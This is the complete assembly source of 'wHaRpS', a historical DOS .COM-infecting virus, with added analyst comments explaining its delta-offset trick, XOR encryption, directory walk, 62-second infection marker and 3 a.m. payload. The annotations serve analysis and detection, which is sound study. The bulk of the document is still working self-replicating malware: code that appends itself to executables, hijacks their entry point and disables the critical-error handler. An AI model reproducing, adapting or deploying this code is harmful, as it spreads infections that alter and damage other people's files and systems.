; "One must crawl before one walks."
; wHaRpS Virus 1.0
; wHaRpS virus of independent virus writer FirstStrike
; For use by [Phalcon\Skism] ONLY!
; Special thanx to:
; Gheap
; Dark Angel
; Demogorgon

;-----------------------------------------------------------------------
; Analyst notes (added on review).  Historical 16-bit real-mode DOS .COM
; appender in MASM/TASM-style syntax (the "NASM" tag on the hosting page
; is wrong: name/title/segment/assume/label/word ptr are MASM idioms).
;
; What the listing shows:
;   * tiny-model .COM layout: one segment, cs=ds=es, org 100h, and every
;     label is addressed relative to the "delta offset" kept in bp (see
;     begin/setup) because the body is appended to hosts of any length.
;   * Work areas are not declared as data; they are bare offsets high in
;     the 64 KiB segment (equates below).  65400d is close to where a
;     .COM's initial stack sits -- presumably the author relied on the
;     stack staying shallow; not verified here.
;   * Infection marker: the victim's time-of-day seconds field (see
;     check_if_ill and attrib_stuff).  Plaintext artefacts an analyst can
;     key on: '[wHaRpS]', 'Joy J.' and the payload message in the data
;     area, plus the cleartext decryptor stub before 'main'.
;-----------------------------------------------------------------------
name wHaRpS
title                                   ; empty TITLE directive
code segment
assume cs:code,ds:code
org 100h                                ; .COM: PSP at 0..0FFh, code image starts at 100h

; --- scratch areas: absolute offsets inside the code segment ----------
; DTA (disk transfer area) fields used: 16h = file time word,
; 1Ah = file size (only the low word is ever compared), 1Eh = ASCIIZ
; file name.  65000d = 0FDE8h.
dta equ 65000d ; DTA address to be set
fname equ 65000d + 1eh ; DTA - file name
ftime equ 65000d + 16h ; DTA - file time
fsize equ 65000d + 1ah ; DTA - file size
orgdir equ 65400d ; original path storage              ; filled by INT 21h/47h in system_pic
date equ 65300d ; store file date
time equ 65302d ; store file time
attrib equ 65304d ; store file attrib
err1 equ 65306d ; old error handler address            ; offset half of the saved INT 24h vector
err2 equ 65308d ; old error handler address            ; segment half

olddta equ 80h ; original DTA address                  ; the default DTA inside the PSP
begin:
; Entry point of the appended body.  A victim's first instruction is
; overwritten with 'jmp' here (jmpc/new_jmp in infect).  The displacement
; written is the host's full length, so the jump lands 3 bytes past
; 'begin' -- these three nops are what absorb that.
nop
nop
nop
call setup ; find "delta offset"
setup:
pop bp                                  ; bp = run-time address of 'setup'
sub bp, offset setup                    ; bp = load address - assembled address; added to every label below
jmp main ; DEBUG E8 02 00
; NOTE(review): crypt_em (next block) is only invoked from 'infect', right
; before the body is written out XOR'd, and no decrypt step precedes
; 'main' in this listing.  The "DEBUG E8 02 00" remark reads like a hand
; patch applied to the assembled binary at this spot -- inferred from the
; comment, not shown by the source.
nop
jmp main                                ; unreachable as assembled (follows an unconditional jmp)
crypt_em:
; In-place XOR of the region main..end_crypt with a single key byte.
; The key is the immediate of the 'xor al,imm8' formed by the two db
; lines below; crypt_change patches it at run time, so in the assembled
; file it is 0 and the pass is a no-op.  Relies on ds=es=cs (.COM) and on
; bp holding the delta offset.
; In:  bp = delta offset      Out: cx = 0, si = di = end of the region
; Clobbers: al, cx, si, di, flags
; Detection note: this loop (lodsb / 34h xx / stosb / loop) and everything
; before 'main' are stored in clear in every infected file; only
; main..end_crypt varies with the key.
xor di,di                               ; immediately overwritten by 'mov di, si'
lea si, [bp+main]
mov di, si                              ; read and write back the same address
mov cx, end_crypt - main                ; byte count of the keyed region

xor_loop:
lodsb ; ds:[si] -> al
db 34h ; xor al, XX                     ; opcode byte of 'xor al,imm8' ...
encrypt_val db 0 ; Starting encryption value is 0   ; ... and its immediate: the key, stored by crypt_change
stosb ; al ->es:[di]
loop xor_loop
ret
main:
; First code run once the delta offset is known: put the host's original
; three bytes (saved in 'saveins' at infection time) back at 100h, so
; that 'done' can later jump to 100h and run the host.  Needs es=ds=cs.
xor di,di                               ; redundant; di is set on the next line
mov di,0100h ; Restore first three
lea si,[bp+saveins] ; original program bytes
mov cx,0003d
rep movsb
jmp system_pic ; Take a "picture" of system settings

handler: ; error handler
; Replacement INT 24h (critical error) handler installed by errorh.
; Returns al=0 ("ignore") to DOS, so a write-protected or failing disk
; never raises the Abort/Retry/Fail prompt while the virus is working.
mov al,0
iret
endp                                    ; NOTE(review): no matching 'proc' directive is visible in this listing
data label byte                         ; unused label marking the start of the constants
wharps db '[wHaRpS]',0 ; wHaRpS ID     ; never referenced by code, but present in every infected file
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me   ; literal mangled by re-encoding on this page (high-bit bytes in the original); never referenced
dir_mask db '*.',0 ; dir atrib          ; FindFirst mask: entries with no extension (used with the directory attribute)
allcom db '*.COM',0 ; what to search for
root db '\',0 ; root
saveins db 0e8h,00h,00h ; original three bytes   ; overwritten with the victim's first 3 bytes by infect (INT 21h/3Fh)
ultimate dw 0 ; ultimate dir to be reached       ; ordinal (in FindFirst/FindNext order) of the root subdirectory to visit
current dw 0 ; current dir                       ; ordinal of the subdirectory the enumeration is currently on
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'   ; payload text, '$'-terminated for INT 21h/09h
system_pic: ; SNAP!
; Record the caller's current directory (so 'done' can return to it),
; pick the XOR key, and decide between payload and infection.
mov ah,47h ; get original path          ; INT 21h/47h: get current directory
mov dl,0                                ; dl=0: default drive
lea si,cs:orgdir ; store original path  ; ds:si = orgdir scratch area (absolute offset, no bp adjustment)
int 21h

crypt_change: ; set crypt value
; INT 21h/2Ch (get system time): ch=hour, cl=minute, dh=second, dl=1/100 s.
mov ah,2ch
int 21h
mov [bp+encrypt_val],dl                 ; XOR key = hundredths of a second (0..99); patches the imm8 inside crypt_em
; Trigger: hour == 3 and minute == 0 -> payload; any other time -> infect.
cmp ch,03
jz more
jmp errorh

more:
cmp cl,00
jz bomb
jmp errorh

bomb:
; Payload: print the message and terminate.  The host is NOT run on this
; path -- its bytes were restored at 100h by main, but 4Ch exits first.
mov ah,09h
lea dx,[bp+message]
int 21h
mov ah,4ch
int 21h

errorh:
; Save the current INT 24h vector (es:bx from 35h) in err2:err1, then
; point INT 24h at 'handler' so critical errors are silently ignored.
; 25h takes ds:dx; ds=cs in a .COM, so [bp+handler] is the right address.
push es ; save original error handler address
mov ax,3524h
int 21h
mov word ptr cs:err1,bx
mov word ptr cs:err2,es
pop es

mov ax,2524h ; set an error handler
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
int 21h
jmp pre_search
drop_to_root: ; subroutine to visit the root
; Two entry points sharing one INT 21h/3Bh (chdir) tail:
;   drop_to_root: chdir to '\' (root of the current drive)
;   set_path:     chdir to the name currently in the DTA (fname), i.e.
;                 the subdirectory FindFirst/FindNext just reported
; Out: CF as returned by DOS (no caller checks it).  Clobbers: ax, dx, flags.
lea dx,[bp+root]
jmp continue

set_path: ; OR set a path
lea dx,cs:fname                         ; absolute scratch offset, no bp adjustment

continue:
mov ah,3bh
int 21h
ret
return_to_search:
; No usable .COM in the current subdirectory: advance to the next root
; subdirectory (by ordinal), go back to '\' and re-enumerate from scratch.
inc [bp+ultimate]
call drop_to_root
mov [bp+current],0000
jmp find_first_dir
pre_search: ; set a DTA
; Move the DTA from the PSP default (80h) to the scratch offset so that
; FindFirst/FindNext results land where fname/ftime/fsize point.
mov dx,dta
mov ah,1ah
int 21h

; Counters: the walk visits root subdirectory number 'ultimate', where the
; number is simply the position in FindFirst/FindNext order.
mov [bp+current],0000 ; zero the counters
mov [bp+ultimate],0000 ; ""
inc [bp+ultimate] ; want to search 1st dir in root
call drop_to_root ; bomb to root
find_first_dir: ; directory searchin'
; INT 21h/4Eh with mask '*.' and attribute 16 (include directories):
; enumerate the root's subdirectories.  Falls through to dir_test on a
; hit; CF set (nothing found) ends the run.
lea dx,[bp+dir_mask]
mov cx,16                               ; attribute mask: directories
mov ah,4Eh
int 21h
jc almost_done ; no directories?

dir_test:
; Count hits until the 'ultimate'-th one, then chdir into it and look
; for .COM files there.
inc [bp+current] ; directory found - MARK!
mov bx,[bp+current]
cmp word ptr [bp+ultimate],bx ; is it the one we want?
jnz find_next_dir ; no, find another
call set_path ; yes, set the correct path
jmp find_first_file ; find some .COMs

find_next_dir: ; mo' directory searchin'
mov ah,4fh                              ; FindNext on the same DTA
int 21h
jc almost_done                          ; ran past the last subdirectory: give up for this run
jmp dir_test ; go see if correct dir found yet
find_first_file: ; file searchin'
; INT 21h/4Eh for '*.COM' in the directory just entered; attribute 1 so
; read-only files are included.  Each hit is screened by check_if_ill;
; the first acceptable one is infected and the run then ends (infect
; jumps to done), i.e. at most one file per execution.
lea dx,[bp+allcom]
mov cx,00000001b                        ; include read-only files
mov ah,4Eh
int 21h
jc return_to_search ; no .COM so mo' dir
jmp check_if_ill ; is the file "sick"?

find_next_file: ; keep on a searchin'
mov ah,4fh
int 21h
jc return_to_search ; no more .COM so back
; to the directories

check_if_ill: ; check file's health
; Infection marker: the DTA time word's low 5 bits are seconds/2.  A value
; of 31 (= 62 s, never produced by a normal save) means "already
; infected"; attrib_stuff stamps it on every victim.  Detection tip: .COM
; files whose modification time shows 62 seconds are candidates for this
; family.
mov ax,cs:ftime
and al,11111b ; good, your sick!
cmp al,62d/2 ; (No more 62 seconds as virus
jz find_next_file ; markers! - I swear!)

; Size window 500..60000 bytes.  Only the low word of the DTA size dword
; is compared (fsize is a 16-bit compare), so the check is not exact for
; files of 64 KiB or more.
cmp cs:fsize,60000d ; whoa, file to big!
ja find_next_file ; so, get a new one

cmp cs:fsize,500d ; whoa, file to small!
jb find_next_file ; throw it back and move on
jmp infect ; perfect, for infection

db 'Joy J.',0 ; don't ask                ; never executed, but a plaintext marker carried in every infected file
error:
pre_done:
almost_done:
; Shared bail-out.  'infect' reaches pre_done after the victim is already
; open (3D02h) and after its read-only bit was cleared (4301h); nothing on
; this path closes the handle or restores the attribute, so a failed
; attempt can leave a file with its read-only bit stripped -- a forensic
; trace worth knowing about.
jmp done ; in case of emergency.....
infect:
; Append the body to the .COM named in the DTA and redirect its entry.
; Sequence: get attribute -> clear read-only -> open r/w -> save
; date/time -> save first 3 bytes -> seek to end (the new length is the
; jmp displacement) -> XOR the body in memory -> write body -> write the
; 3-byte 'jmp' at offset 0 -> restore date/time with the 62-second
; marker -> close -> restore attribute.  Every DOS failure branches to
; pre_done/done; there is no unwind of work already done.
; Registers: bx = file handle after the open; bp = delta offset
; throughout; cs-relative scratch (attrib/time/date) holds the saved
; metadata.
mov ah,43h ; save original attribute
mov al,00h                              ; 4300h: get attribute -> cx
lea dx,cs:[fname]
int 21h
mov cs:attrib,cx                        ; mov leaves CF untouched, so the jc below still tests the call
jc pre_done

mov ax,4301h ; clear all attributes      ; in fact only bit 0 (read-only) is cleared
and cx,11111110b ; (none shall slow progress)
int 21h
jc pre_done


mov ax,3d02h ; open the file, please     ; read/write; ds:dx still = fname
int 21h
jc pre_done
xchg bx,ax                              ; bx = handle



mov ax,5700h ; save the date/time        ; 5700h: get file date/time -> cx = time, dx = date
int 21h
mov cs:time,cx
mov cs:date,dx
jc pre_done


mov ah,3Fh ; read first 3 bytes of file  ; into saveins; 'main' puts them back at 100h in the next generation
mov cx,0003h ; to be infected and save
lea dx,[bp+saveins]
int 21h
jc pre_done

mov ax,4202h ; move to end of file       ; seek(0, end): dx:ax = new position = file length
xor cx,cx
xor dx,dx
int 21h
jc pre_done
mov [bp+new_jmp],ax                     ; displacement of the entry 'jmp' = length (lands on the nops at begin)

call crypt_em                           ; XOR main..end_crypt in place; the image written next is keyed

end_crypt label byte ; encrypt to here

mov ah,40h                              ; write endcode-begin bytes from 'begin' at the current (end) position
mov cx,endcode-begin
lea dx,[bp+begin]
int 21h ; encrypt n' write virus to end of
jc done ; file

mov ax,4200h ; go to beginning of file
xor cx,cx
xor dx,dx
int 21h
jc done
jmp cont

; 3-byte image written over the victim's first instructions: E9 + rel16.
jmpc db 0e9h
new_jmp dw ?

cont:
mov ah,40h
mov cl,3                                ; cx was zeroed for the seek, so cx = 3
lea dx,[bp+jmpc]
int 21h
jc done

attrib_stuff:

; Restore the saved date/time but force the seconds field (low 5 bits of
; the time word) to 31 -> "62 seconds", the marker check_if_ill tests.
; Done before the close, presumably so the close does not re-stamp the
; current time.
mov ax,5701h
mov cx,cs:[time]
mov dx,cs:[date]
or cl,11111b
int 21h
jc done

mov ah,3eh                              ; close handle bx
int 21h
jc done

mov ax,4301h                            ; put the original attribute (read-only bit included) back
mov cx,cs:[attrib]
lea dx,cs:[fname]
int 21h
jc done
done:
; Unwind: DTA back to the PSP default, INT 24h vector "restored", working
; directory put back, then run the host from 100h (its first 3 bytes were
; restored by main).
mov dx,olddta ; restore all changes
mov ah,1ah
int 21h

push ds
mov ax,2524h
; NOTE: the two lea's load the *addresses* of the err2/err1 scratch words
; (65308d/65306d = 0FF1Ch/0FF1Ah), not the vector values saved by errorh.
; So INT 24h is set to 0FF1Ch:0FF1Ah, not to the original handler.
; Observable after a run: critical errors no longer reach the real
; INT 24h handler.
lea dx,cs:[err2]
mov ds,dx
lea dx,cs:[err1]
int 21h
pop ds

mov ah,3bh
; '/' (2Fh) is an immediate used as an offset: ds:dx points at PSP byte
; 2Fh, not at a path string, so this chdir operates on whatever bytes sit
; there (compare drop_to_root, which uses the 'root' string).
mov dx,'/'
int 21h

mov ah,3bh
lea dx,cs:[orgdir]                      ; path recorded by system_pic (INT 21h/47h returns it without a leading '\')
int 21h

xor di,di
mov di,0100h
jmp di ; good_bye                        ; into the restored host entry point

endcode label byte                      ; end of the appended image (write length = endcode - begin)

code ends
end begin